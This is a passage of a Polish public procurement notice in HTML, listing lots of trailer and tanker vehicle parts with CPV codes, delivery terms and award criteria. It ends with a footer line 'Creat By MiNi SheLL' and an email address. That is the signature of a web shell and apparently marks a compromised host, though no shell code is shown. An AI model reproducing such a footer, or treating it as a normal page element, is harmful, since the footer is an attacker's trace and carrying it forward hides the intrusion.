2. Zawór kulowy Dn 100 DP-14K do CND -33 (mocowany z jednej strony na 8 otw. fi 14 na średnicy podziałowej fi 180, z drugiej strony  na 8 otw. fi 14 na średnicy podziałowej fi 150, z dźwignią wskazującą kierunek przepływu) w ilości 10 szt.;
3. Regulator ciśnienia paliwa Jelcz 642 nr 99460567 5K w ilości 5 szt.;
4. Siłownik hamulcowy powietrzny X53.32.00 (fi 125) w ilości 50 szt.;
5. Siłownik powietrzny hamulcowy fi 180 lewy 925-302-192-0 w ilości 5 szt.;
6. Siłownik powietrzny hamulcowy fi 180 prawy 925-302-182-0 w ilości 8 szt.;
7. Zbiornik płynu hamulcowego Star 266 z pojemnikiem gumowym na wodę w ilości 60 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin tealizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 5:
1. Lusterko zewnętrzne LG-1 w ilości 100 szt.;
2. Szyba przednia Jelcz 642 nr 1021529142019 w ilości 1 szt.;
3. Zamknięcie łaty pomiarowej 103.00.01 - TM w ilości 5 kpl.;
4. Sworzeń resoru podwozia D-46 w ilości 40 szt.;
5. Wieszak resoru WN-161-00-111Y w ilości 12 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 6:
1. Pistolet automatyczny ZVA2 4.1 ze złączem obrotowym i końcówką Camlock 1 1/2 cala w ilości 60 szt.;
2. Wylewka ZR 32  do pistoletu ZV400 w ilości 50 szt.;
3. Wylewka ZR 38  do pistoletu ZV400 w ilości 130 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 7:
1. Obejma skorupowa mocowana na bolec SX 32 w ilości 20 kpl.;
2. Obejma skorupowa mocowana na bolec SX 38 w ilości 50 kpl.;
3. Obejma skorupowa skręcana śrubami SC 38 w ilości 50 kpl.;
4. Obejma skorupowa skręcana śrubami SC 50 w ilości 20 kpl.;
5. Obejma skorupowa skręcana śrubami SC 76 - 16 bar - wykonanie nierdzewne w ilości 100 kpl.;
6. Obejma zaciskowa GBS 70-80 ocynkowana skręcana na śrubę w ilości 500 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 8:
1. Pokrywa włazu 58.00.185 ND33 - TM w ilości 10 szt.;
2. Pokrywa włazu 58.00.186 ND33 - TM w ilości 10 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 9:
1. Pokrywka 98.00.17 przyłącza 98.00.19 wahadła 4 cali, interlock, wziernik - TM do ND-33 w ilości 10 szt.;
2. Przyłącze 98.00.19 wahadła 4 cale, interlock, wziernik - TM do ND-33 w ilości 10 szt.;
3. Trzpień VRS 38x50 Ms Gwint wewnętrzny + obejma w ilości 50 kpl.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 10:
1. Zaślepka DC 3 cale Al. 16 bar oznakowane z kartą katalogową w ilości 100 szt.;
2. Zaślepka DP 3 cale Al. 16 bar oznakowane z kartą katalogową w ilości 100 szt.;
3. Złącze C 3 cale Al. 16 bar oznakowane z kartą katalogową w ilości 100 szt.;
4. Złącze E 3 cale Al. 16 bar oznakowane z kartą katalogową w ilości 100 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.40.00-3, 34.22.42.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa części przyczep, naczep i innych pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części przyczep, naczep i innych pojazdów w ilościach:
ZADANIE NR 11:
1. Zawór sterujący przyczepy	w ilości 15 szt.;
2. Regulator siły hamowania 3-zakresowy w ilości 15 szt.;
3. Odwadniacz automatyczny	w ilości 15 szt.;
4. Amortyzator gumowy (odbój) w ilości 30 szt.;
5. Siłownik hamulcowy fi 80 X.53.12.00 w ilości 20 szt.;
6. Bęben hamulcowy przyczepy D-47 w ilości 4 szt.;
7. Szczęka hamulcowa prawa do przyczepy D-47 w ilości 8szt.;
8. Szczęka hamulcowa lewa do przyczepy D-47	w ilości 8 szt.;
9. Filtr przewodowy w ilości 10 szt.;
10. Złącze przewodów hamulcowych w ilości 10 szt.;
11. Sprężyna szczęk hamulca w ilości 20 szt.;
12. Ucho dyszla przyczepy w ilości 2 szt.;
13. Amortyzator w ilości 8 szt.;
14. Kpl uszczelniaczy siłownika hamulcowego przyczepy fi 80 w ilości  20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.22.41.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com